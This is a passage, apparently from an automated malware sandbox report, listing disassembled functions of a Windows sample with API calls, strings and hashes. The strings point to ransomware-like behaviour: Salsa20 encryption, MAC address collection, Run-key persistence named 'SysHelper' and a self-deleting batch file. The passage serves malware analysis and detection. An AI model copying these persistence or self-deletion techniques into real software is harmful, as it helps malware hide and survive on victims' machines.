                                                                                      • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411948
                                                                                      • LocalAlloc.KERNEL32(00000040,00000000,?,00000400,?,00000000,00000000), ref: 00411956
                                                                                      • lstrcpyW.KERNEL32 ref: 00411962
                                                                                      • lstrcatW.KERNEL32(00000000, failed with error ), ref: 00411974
                                                                                      • lstrcatW.KERNEL32(00000000,?), ref: 0041198B
                                                                                      • lstrcatW.KERNEL32(00000000,00500260), ref: 00411993
                                                                                      • lstrcatW.KERNEL32(00000000,?), ref: 00411999
                                                                                      • lstrlenW.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 004119A3
                                                                                      • _memset.LIBCMT ref: 004119B8
                                                                                      • lstrcpynW.KERNEL32(?,00000000,00000400,?,00000400,?,00000000,00000000), ref: 004119DC
                                                                                        • Part of subcall function 00412BA0: lstrlenW.KERNEL32(?), ref: 00412BC9
                                                                                      • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411A01
                                                                                      • LocalFree.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 00411A04
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: lstrcatlstrlen$Local$Free$AllocErrorFormatLastMessage_memsetlstrcpylstrcpyn
                                                                                      • String ID: failed with error
                                                                                      • API String ID: 4182478520-946485432
                                                                                      • Opcode ID: 18b9b32fccc37a3c6be161fd0b5e4603234beec1f634f25e965e40264c5ea564
                                                                                      • Instruction ID: 1677776e610180b78075291f83559cfdcc99dc463041ebd32873df59a21ecb07
                                                                                      • Opcode Fuzzy Hash: 18b9b32fccc37a3c6be161fd0b5e4603234beec1f634f25e965e40264c5ea564
                                                                                      • Instruction Fuzzy Hash: 0021FB31A40214B7D7516B929C85FAE3A38EF45B11F100025FB09B61D0DE741D419BED
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040F730, Relevance: 29.2, APIs: 19, Instructions: 732COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00411AB0: PeekMessageW.USER32 ref: 00411ACA
                                                                                        • Part of subcall function 00411AB0: DispatchMessageW.USER32 ref: 00411AE0
                                                                                        • Part of subcall function 00411AB0: PeekMessageW.USER32 ref: 00411AEE
                                                                                      • PathFindFileNameW.SHLWAPI(?,?,00000000,000000FF), ref: 0040F900
                                                                                      • _memmove.LIBCMT ref: 0040F9EA
                                                                                      • PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 0040FA51
                                                                                      • _memmove.LIBCMT ref: 0040FADA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Message$FileFindNamePathPeek_memmove$Dispatch
                                                                                      • String ID:
                                                                                      • API String ID: 273148273-0
                                                                                      • Opcode ID: 9523524d8d3b45d9081d0fccdbbe5b8ea63895c3f5938442575e5094c992c0b6
                                                                                      • Instruction ID: a2fe25dd57492d494e78aebb36a96054b80ce25314fb01b08d1ce03a62da89f0
                                                                                      • Opcode Fuzzy Hash: 9523524d8d3b45d9081d0fccdbbe5b8ea63895c3f5938442575e5094c992c0b6
                                                                                      • Instruction Fuzzy Hash: D652A271D00208DBDF20DFA4D985BDEB7B4BF05308F10817AE419B7291D779AA89CB99
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040E870, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 165encryptionCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,004FFCA4,00000000,00000000), ref: 0040E8CE
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0040E8E4
                                                                                        • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                      • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0040E8F9
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0040E90F
                                                                                      • CryptHashData.ADVAPI32(00000000,00000000,?,00000000), ref: 0040E928
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0040E93E
                                                                                      • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 0040E95D
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0040E96F
                                                                                      • _memset.LIBCMT ref: 0040E98E
                                                                                      • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0040E9A2
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0040E9B4
                                                                                      • _sprintf.LIBCMT ref: 0040E9D3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CryptException@8Throw$Hash$Param$AcquireContextCreateDataExceptionRaise_memset_sprintf
                                                                                      • String ID: %.2X
                                                                                      • API String ID: 1084002244-213608013
                                                                                      • Opcode ID: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                                                                                      • Instruction ID: 6020eefb82f776eec2353dc0ff897aa1862dcd4ecc30860888fbdadc8ba65bc1
                                                                                      • Opcode Fuzzy Hash: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                                                                                      • Instruction Fuzzy Hash: 835173B1E40209EBDF11DFA2DC46FEEBB78EB04704F10452AF501B61C1D7796A158BA9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040EAA0, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 159encryptionCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,004FFCA4,00000000), ref: 0040EB01
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0040EB17
                                                                                        • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                      • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0040EB2C
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0040EB42
                                                                                      • CryptHashData.ADVAPI32(00000000,?,?,00000000), ref: 0040EB4E
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0040EB64
                                                                                      • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,?,00000000), ref: 0040EB83
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0040EB95
                                                                                      • _memset.LIBCMT ref: 0040EBB4
                                                                                      • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0040EBC8
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0040EBDA
                                                                                      • _sprintf.LIBCMT ref: 0040EBF4
                                                                                      • CryptDestroyHash.ADVAPI32(00000000), ref: 0040EC44
                                                                                      • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0040EC4F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Crypt$Exception@8HashThrow$ContextParam$AcquireCreateDataDestroyExceptionRaiseRelease_memset_sprintf
                                                                                      • String ID: %.2X
                                                                                      • API String ID: 1637485200-213608013
                                                                                      • Opcode ID: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                                                                                      • Instruction ID: 14d7d02cf3c54262bdef7e6fa07b3cadf7b2b7504ea62fb0b9d39e8d8664034d
                                                                                      • Opcode Fuzzy Hash: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                                                                                      • Instruction Fuzzy Hash: A6515371E40209ABDF11DBA6DC46FEFBBB8EB04704F14052AF505B62C1D77969058BA8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040E670, Relevance: 26.3, APIs: 12, Strings: 3, Instructions: 78COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _malloc.LIBCMT ref: 0040E67F
                                                                                        • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                        • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                        • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(005E0000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                                                                                      • _malloc.LIBCMT ref: 0040E68B
                                                                                      • _wprintf.LIBCMT ref: 0040E69E
                                                                                      • _free.LIBCMT ref: 0040E6A4
                                                                                        • Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
                                                                                        • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13
                                                                                      • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0040E6B9
                                                                                      • _free.LIBCMT ref: 0040E6C5
                                                                                      • _malloc.LIBCMT ref: 0040E6CD
                                                                                      • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0040E6E0
                                                                                      • _sprintf.LIBCMT ref: 0040E720
                                                                                      • _wprintf.LIBCMT ref: 0040E732
                                                                                      • _wprintf.LIBCMT ref: 0040E73C
                                                                                      • _free.LIBCMT ref: 0040E745
                                                                                      Strings
                                                                                      • %02X:%02X:%02X:%02X:%02X:%02X, xrefs: 0040E71A
                                                                                      • Error allocating memory needed to call GetAdaptersinfo, xrefs: 0040E699
                                                                                      • Address: %s, mac: %s, xrefs: 0040E72D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _free_malloc_wprintf$AdaptersHeapInfo$AllocateErrorFreeLast_sprintf
                                                                                      • String ID: %02X:%02X:%02X:%02X:%02X:%02X$Address: %s, mac: %s$Error allocating memory needed to call GetAdaptersinfo
                                                                                      • API String ID: 3901070236-1604013687
                                                                                      • Opcode ID: 3662c7b498418dd0805699ed7e156d37d96e3abec8e0c242f5b97c865e313c7a
                                                                                      • Instruction ID: 1f0497fb971ee708fef02f82321736b2a43cb7681c3985dbc626545fd8dc3fd8
                                                                                      • Opcode Fuzzy Hash: 3662c7b498418dd0805699ed7e156d37d96e3abec8e0c242f5b97c865e313c7a
                                                                                      • Instruction Fuzzy Hash: 251127B2A045647AC27162F76C02FFF3ADC8F45705F84056BFA98E1182EA5D5A0093B9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00410160, Relevance: 26.2, APIs: 17, Instructions: 660COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00411AB0: PeekMessageW.USER32 ref: 00411ACA
                                                                                        • Part of subcall function 00411AB0: DispatchMessageW.USER32 ref: 00411AE0
                                                                                        • Part of subcall function 00411AB0: PeekMessageW.USER32 ref: 00411AEE
                                                                                      • PathFindFileNameW.SHLWAPI(?,?,00000000), ref: 00410346
                                                                                      • _memmove.LIBCMT ref: 00410427
                                                                                      • PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 0041048E
                                                                                      • _memmove.LIBCMT ref: 00410514
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Message$FileFindNamePathPeek_memmove$Dispatch
                                                                                      • String ID:
                                                                                      • API String ID: 273148273-0
                                                                                      • Opcode ID: 5579d069003674f30fc20657d67551341dfb12f417424f211cabcd1385ef9a93
                                                                                      • Instruction ID: 4d52a43d2e6eeb98f1fe08e229a92f838bd03635929547cf71b8ba18611ce854
                                                                                      • Opcode Fuzzy Hash: 5579d069003674f30fc20657d67551341dfb12f417424f211cabcd1385ef9a93
                                                                                      • Instruction Fuzzy Hash: EF429F70D00208DBDF14DFA4C985BDEB7F5BF04308F20456EE415A7291E7B9AA85CBA9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00412440, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 52processCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 0041244F
                                                                                      • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00412469
                                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 004124A1
                                                                                      • TerminateProcess.KERNEL32(00000000,00000009), ref: 004124B0
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 004124B7
                                                                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 004124C1
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 004124CD
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                                                                      • String ID: cmd.exe
                                                                                      • API String ID: 2696918072-723907552
                                                                                      • Opcode ID: 577ed8ed9705958fd2e422ac99cb6a94193351d2856dfe9262a659f2a85694a3
                                                                                      • Instruction ID: b239e8364e8e77cb7af63d5752a1eab109cf3eb7ce5fcb3b526656d556a9da04
                                                                                      • Opcode Fuzzy Hash: 577ed8ed9705958fd2e422ac99cb6a94193351d2856dfe9262a659f2a85694a3
                                                                                      • Instruction Fuzzy Hash: ED0192355012157BE7206BA1AC89FAF766CEB08714F0400A2FD08D2141EA6489408EB9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004382A2, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _wcscmp.LIBCMT ref: 004382B9
                                                                                      • _wcscmp.LIBCMT ref: 004382CA
                                                                                      • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,00438568,?,00000000), ref: 004382E6
                                                                                      • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,00438568,?,00000000), ref: 00438310
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000001.301512197.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000001.302515872.0000000000529000.00000040.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000001.302558580.000000000052B000.00000040.00020000.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: InfoLocale_wcscmp
                                                                                      • String ID: ACP$OCP
                                                                                      • API String ID: 1351282208-711371036
                                                                                      • Opcode ID: 102afb5f5093c9dfdd8a19d426743dda05a0526c846065600ba6b69f24068785
                                                                                      • Instruction ID: cf0fde08c92294f7ab6fed71b02f11d94bd2ad82eb759ef3fcb1a01a65759ec5
                                                                                      • Opcode Fuzzy Hash: 102afb5f5093c9dfdd8a19d426743dda05a0526c846065600ba6b69f24068785
                                                                                      • Instruction Fuzzy Hash: FA01C431200615ABDB205E59DC45FD77798AB18B54F10806BF908DA252EF79DA41C78C
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040C070, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 280COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      • input != nullptr && output != nullptr, xrefs: 0040C095
                                                                                      • e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl, xrefs: 0040C090
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000001.301512197.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000001.302515872.0000000000529000.00000040.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000001.302558580.000000000052B000.00000040.00020000.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: __wassert
                                                                                      • String ID: e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl$input != nullptr && output != nullptr
                                                                                      • API String ID: 3993402318-1975116136
                                                                                      • Opcode ID: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
                                                                                      • Instruction ID: 1562121ec4d7abfac7b8d7a3269f54288592c24a15d8ca99342f0f863a8d7c6a
                                                                                      • Opcode Fuzzy Hash: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
                                                                                      • Instruction Fuzzy Hash: 43C18C75E002599FCB54CFA9C885ADEBBF1FF48300F24856AE919E7301E334AA558B54
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004124E0, Relevance: 79.0, APIs: 36, Strings: 9, Instructions: 214synchronizationCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004124FE
                                                                                      • GetLastError.KERNEL32 ref: 00412509
                                                                                      • CloseHandle.KERNEL32 ref: 0041251C
                                                                                      • CloseHandle.KERNEL32 ref: 00412539
                                                                                      • CreateMutexA.KERNEL32(00000000,00000000,{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}), ref: 00412550
                                                                                      • GetLastError.KERNEL32 ref: 0041255B
                                                                                      • CloseHandle.KERNEL32 ref: 0041256E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000001.301512197.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000001.302515872.0000000000529000.00000040.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000001.302558580.000000000052B000.00000040.00020000.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CloseHandle$CreateErrorLastMutex
                                                                                      • String ID: "if exist "$" goto try$@echo off:trydel "$D$TEMP$del "$delself.bat${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
                                                                                      • API String ID: 2372642624-488272950
                                                                                      • Opcode ID: 4506a078386c228e7a8f507305766ec05e664451a55683de5f3f64ca7fb9d614
                                                                                      • Instruction ID: b8d6f70f31989c1caf7dd59f8aefe182ce9601728b58fe5e15313657dd94e056
                                                                                      • Opcode Fuzzy Hash: 4506a078386c228e7a8f507305766ec05e664451a55683de5f3f64ca7fb9d614
                                                                                      • Instruction Fuzzy Hash: 03714E72940218AADF50ABE1DC89FEE7BACFB44305F0445A6F609D2090DF759A88CF64
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004635B0, Relevance: 21.5, APIs: 7, Strings: 5, Instructions: 475COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _strncmp
                                                                                      • String ID: $-----$-----BEGIN $-----END $.\crypto\pem\pem_lib.c
                                                                                      • API String ID: 909875538-2733969777
                                                                                      • Opcode ID: cb9e21a8909c22ae086980ad9bb3b6b683aca236df65bd2ad44c41cd33641913
                                                                                      • Instruction ID: 696768b63e7695c6252fa4396c8fc8293dc5daf0279c077ed15b414a568efc74
                                                                                      • Opcode Fuzzy Hash: cb9e21a8909c22ae086980ad9bb3b6b683aca236df65bd2ad44c41cd33641913
                                                                                      • Instruction Fuzzy Hash: 82F1E7B16483806BE721EE25DC42F5B77D89F5470AF04082FF948D6283F678DA09879B
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00425A97, Relevance: 19.6, APIs: 13, Instructions: 84COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
                                                                                      • String ID:
                                                                                      • API String ID: 1503006713-0
                                                                                      • Opcode ID: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                                                                                      • Instruction ID: 8b5b6749b4f509f283f4592c8036b9fc340ac08d61b50d13b2524a40b9fdfb6a
                                                                                      • Opcode Fuzzy Hash: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                                                                                      • Instruction Fuzzy Hash: 7E21B331705A21ABE7217F66B802E1F7FE4DF41728BD0442FF44459192EA39A800CA5D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0041BAE0, Relevance: 18.3, APIs: 12, Instructions: 320windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • PostQuitMessage.USER32(00000000), ref: 0041BB49
                                                                                      • DefWindowProcW.USER32(?,?,?,?), ref: 0041BBBA
                                                                                      • _malloc.LIBCMT ref: 0041BBE4
                                                                                      • GetComputerNameW.KERNEL32 ref: 0041BBF4
                                                                                      • _free.LIBCMT ref: 0041BCD7
                                                                                        • Part of subcall function 00411CD0: RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D12
                                                                                        • Part of subcall function 00411CD0: _memset.LIBCMT ref: 00411D3B
                                                                                        • Part of subcall function 00411CD0: RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00411D63
                                                                                        • Part of subcall function 00411CD0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D6C
                                                                                        • Part of subcall function 00411CD0: lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00411DD6
                                                                                        • Part of subcall function 00411CD0: PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00411E48
                                                                                      • IsWindow.USER32(?), ref: 0041BF69
                                                                                      • DestroyWindow.USER32(?), ref: 0041BF7B
                                                                                      • DefWindowProcW.USER32(?,00008003,?,?), ref: 0041BFA8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Window$Proc$CloseComputerDestroyExistsFileMessageNameOpenPathPostQueryQuitValue_free_malloc_memsetlstrlen
                                                                                      • String ID:
                                                                                      • API String ID: 3873257347-0
                                                                                      • Opcode ID: d87ae02ebb827c572a96defd0b94b563a2a13f3acd0a84997267fb9c98df2b66
                                                                                      • Instruction ID: 866eb7db68ae170cd8e17be643faf7720e0ae735171854e0fa5cbc2bc792534d
                                                                                      • Opcode Fuzzy Hash: d87ae02ebb827c572a96defd0b94b563a2a13f3acd0a84997267fb9c98df2b66
                                                                                      • Instruction Fuzzy Hash: 85C19171508340AFDB20DF25DD45B9BBBE0FF85318F14492EF888863A1D7799885CB9A
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00425B6E, Relevance: 18.1, APIs: 12, Instructions: 131COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__invoke_watson__wsetlocale_nolock_wcscmp
                                                                                      • String ID:
                                                                                      • API String ID: 2762079118-0
                                                                                      • Opcode ID: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                                                                                      • Instruction ID: 0fe30f67420a0b57e0336c9221d2143c2ac41a82f10de3dc78134a272e9def7d
                                                                                      • Opcode Fuzzy Hash: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                                                                                      • Instruction Fuzzy Hash: BE412932700724AFDB11AFA6B886B9E7BE0EF44318F90802FF51496282DB7D9544DB1D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00411B90, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 110stringcomCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CoInitialize.OLE32(00000000), ref: 00411BB0
                                                                                      • CoCreateInstance.OLE32(004CE908,00000000,00000001,004CD568,00000000), ref: 00411BC8
                                                                                      • CoUninitialize.OLE32 ref: 00411BD0
                                                                                      • SHGetSpecialFolderLocation.SHELL32(00000000,00000007,?), ref: 00411C12
                                                                                      • SHGetPathFromIDListW.SHELL32(?,?), ref: 00411C22
                                                                                      • lstrcatW.KERNEL32(?,00500050), ref: 00411C3A
                                                                                      • lstrcatW.KERNEL32(?), ref: 00411C44
                                                                                      • GetSystemDirectoryW.KERNEL32(?,00000100), ref: 00411C68
                                                                                      • lstrcatW.KERNEL32(?,\shell32.dll), ref: 00411C7A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: lstrcat$CreateDirectoryFolderFromInitializeInstanceListLocationPathSpecialSystemUninitialize
                                                                                      • String ID: \shell32.dll
                                                                                      • API String ID: 679253221-3783449302
                                                                                      • Opcode ID: 45e46fc2f9e137a48023c8b07f4e0b5fd5f09384ac33b8a62bbc2b8c253a451b
                                                                                      • Instruction ID: 1ac700bd2dba931ae0f93f3cd35093afe8c3aec66b03df765643047a9f16b657
                                                                                      • Opcode Fuzzy Hash: 45e46fc2f9e137a48023c8b07f4e0b5fd5f09384ac33b8a62bbc2b8c253a451b
                                                                                      • Instruction Fuzzy Hash: 1D415E70A40209AFDB10CBA4DC88FEA7B7CEF44705F104499F609D7160D6B4AA45CB54
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004549A0, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 107libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetModuleHandleA.KERNEL32(?,?,00000001,?,00454B72), ref: 004549C7
